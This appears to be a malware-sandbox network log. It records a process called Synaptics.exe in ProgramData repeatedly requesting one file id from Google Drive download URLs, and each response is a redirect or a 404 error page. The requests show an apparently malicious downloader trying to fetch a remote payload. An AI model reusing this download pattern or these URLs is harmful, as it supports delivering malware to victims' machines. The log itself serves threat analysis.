                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j2UtMwApTsrGQ0BAuBOV7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.4 | 49934 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:44 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5r37CbweChk2TGgPGhD6xqGx7C3buvydAbuDfEFBq6L0Xkl1HX9F-9P8phRepuJEWW
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-On3dSMNrh260KPs37aMD_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.4 | 49935 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:44 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC40j5xr93o-FJlU-oWlboUMUfc3OpGaNDQFFG24qfvcFGy7C2jX6Ww3dMxEZmU02BEU
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lgHlG5LH-6cazGUvZW6cbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.4 | 49936 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-MK4n0e629i_GuRmUpFW8rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    134 | 192.168.2.4 | 49937 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-M17-eTJWL7xHw2Lmc2cZ4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    135 | 192.168.2.4 | 49938 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4bjhMdS5hK0wr_aM45rZ4SV_aqjJI59Vd-dYagUCdI5ljz3LptmFJ1xU7tgpOtYyoJDgJ9zJc
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-jdX-JH2KZ9N2-ZTF924osA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="eWOsEEXT4SiacyT_P1zCmA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    136 | 192.168.2.4 | 49939 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC70HHyfttWFnYeelbZ3SV0rZihDYIfyEBp1QQQpYIp7u-kqjNuua-ugGzVloeePY-lE
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_5AvQZMnxVXeCnXSGfwdhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="HAhoabXpI2l-M_uIF7pSoA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:45 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    137 | 192.168.2.4 | 49942 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:46 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-QkoLS4_MZPcdmW50QHTLDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    138 | 192.168.2.4 | 49941 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    139 | 192.168.2.4 | 49943 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:46 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    140 | 192.168.2.4 | 49944 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:46 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    141 | 192.168.2.4 | 49947 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:47 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-K1KtW98Mp-I4ZT0dOhBwNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    142 | 192.168.2.4 | 49949 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
